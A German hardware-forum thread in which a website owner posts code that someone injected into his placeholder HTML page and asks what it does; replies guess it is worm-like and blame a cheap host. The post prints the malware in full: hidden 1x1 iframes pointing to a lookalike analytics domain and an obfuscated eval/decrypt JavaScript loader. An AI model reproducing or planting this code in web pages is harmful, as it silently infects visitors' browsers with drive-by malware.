• Hallo Gast!
    Noch bis zum 20.07. kannst Du an unserer Umfrage zum Hersteller des Jahres teilnehmen! Als Gewinn verlosen wir unter allen Teilnehmern dieses Mal eine Grafikkarte Eurer Wahl für bis zu 1.000 EUR - über eine Teilnahme würden wir uns sehr freuen!

Wurde "Schadcode" in meine Seite integriert?

Abweichler

Abweichler

Enthusiast
Thread Starter
Mitglied seit
03.02.2008
Beiträge
73
Ort
Süddeutschland
Hallo zusammen!

Bereits seit ca. 1 Jahr habe ich eine Domain inkl. Webspace registriert, die ich aber aus purem Zeitmangel bisher nicht mit Inhalt füllen konnte. Der Provider liegt in Australien.

Ich hatte lediglich eine einfache .html Seite hinterlegt, die beim Aufruf einen schwarzen Bildschirm hervorruft.

Heute habe ich festgestellt, dass jemand vor ca. 2 Wochen folgenden Code in die Datei eingefügt hat:

PHP: 
<html>
<head>
<title></title>


</head>
<body bgcolor="#000000">
<iframe src=http://google-analysis.com/in.cgi?9 width=1 height=1></iframe><iframe src=http://google-analysis.com/in.cgi?9 width=1 height=1></iframe><br /><br /><br />
</body>
</html><script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hIZQQFx;;lSSloi{5Y5o_X`X.hSn;`Y.hl`?T[g`(QZIm[Zi`lZQIm><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));</script>

Leider weis ich nicht wie der Code dahin kommt noch wer ihn eingefügt hat. Auch kann ich nicht Nachvollziehen was dieser Code eigentlich bewirkt.

Stutzig bin ich erst geworden, als AntiVir sich beim Aufruf der Seite die mit der folgenden Meldung bemerkbar machte:

Code: 
Enthält verdächtigen Code: HEUR/HTML.Malware

Bisher habe ich den Zugriff natürlich verweigert. Gerne wüsste ich aber was der Code oben bedeutet. Kann mir da jemand weiterhelfen?
 
Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
ich denk eher, dass er die script zeile meint, die schon etwas fieser aussieht, vorallem durch decrypt. sowas in dieser form findet sich meist nur in source von würmern. hab zu deinem fall auch ne russische seite gefunden - bei bedarf kannst dich ja per PN melden ...
 
hochvier schrieb:
ich denk eher, dass er die script zeile meint, die schon etwas fieser aussieht, vorallem durch decrypt. sowas in dieser form findet sich meist nur in source von würmern. hab zu deinem fall auch ne russische seite gefunden - bei bedarf kannst dich ja per PN melden ...
Zum Vergrößern anklicken....

Ich meinte die Script-Zeile.
Ja, gerne. Schick mir doch den Link. Mich würde brennend interessieren wie der Code da reinkommt. Kannst du mehr zu deiner Vermutung bezüglich "Würmern" sagen?

Da es sich um einen "Bis zum äußersten Günstig" - Provider (bin ja selber schuld...) handelt, kann ich mir gut vorstellen, dass der Server völlig unzureichend gesichert ist.
 
Zuletzt bearbeitet:
Anmelden, um zu antworten.
Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.


Zurück
Oben Unten refresh